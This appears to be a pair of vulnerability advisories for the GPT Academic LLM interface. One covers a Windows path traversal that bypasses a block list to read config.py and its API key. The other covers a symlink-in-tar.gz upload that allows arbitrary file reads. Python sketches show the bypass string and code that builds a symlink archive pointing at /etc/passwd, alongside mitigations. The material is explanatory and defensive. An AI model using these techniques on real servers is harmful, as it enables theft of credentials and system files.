A path traversal vulnerability in binary-husky/gpt_academic at commit 679352d allows an attacker to bypass the blocked_paths protection and read the config.py file, which contains sensitive information such as the OpenAI API key. The vulnerability is exploitable on Windows operating systems by requesting a URL that includes the absolute path of the project.
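The advisory does not spell out the exact check that fails, but this class of bug typically comes down to comparing the raw request string against a block list without normalizing Windows paths first. The sketch below is illustrative only; the names (blocked_paths, is_allowed) and the matching logic are assumptions for demonstration, not the actual gpt_academic code.

```python
import os

# Assumed, simplified block-list check of the kind this bug class relies on.
blocked_paths = ["config.py", "config_private.py"]

def is_allowed(requested: str) -> bool:
    # Naive comparison against the raw request string, no normalization.
    return all(blocked not in requested for blocked in blocked_paths)

# A relative reference to the protected file is caught:
print(is_allowed("config.py"))                            # False - blocked

# On Windows the same file is reachable via an absolute path with
# backslashes and different casing, which the naive match never sees:
print(is_allowed(r"C:\Projects\gpt_academic\CONFIG.PY"))  # True - bypass

# Resolving the request with os.path.realpath()/os.path.normcase() and
# comparing against resolved block-list entries would close this gap.
```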
GPT Academic provides interactive interfaces for large language models. In versions 3.91 and earlier, GPT Academic does not properly account for soft links. An attacker can create a soft link (symbolic link) pointing to a target file, package the link into a tar.gz archive, and upload it. When the decompressed file is later accessed on the server, the soft link resolves to the target file on the victim server. This allows attackers to read arbitrary files on the server.
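A minimal sketch of how such an archive can be crafted with Python's tarfile module; the member name, archive name, and target path are hypothetical examples, not taken from the advisory.

```python
import tarfile

# Create a tar member that is a symbolic link rather than a regular file.
info = tarfile.TarInfo(name="report.txt")
info.type = tarfile.SYMTYPE      # member is a symlink
info.linkname = "/etc/passwd"    # example target on the victim server

# Symlink members carry no data, so no fileobj is required.
with tarfile.open("malicious.tar.gz", "w:gz") as tar:
    tar.addfile(info)

# If the server extracts this archive without checking member types and then
# serves the extracted "report.txt", the read follows the link to the target.
```

A common mitigation is to inspect members before extraction (e.g., reject those where TarInfo.issym() or TarInfo.islnk() is true), or, on Python 3.12+, to extract with the "data" filter, which refuses links that escape the destination directory.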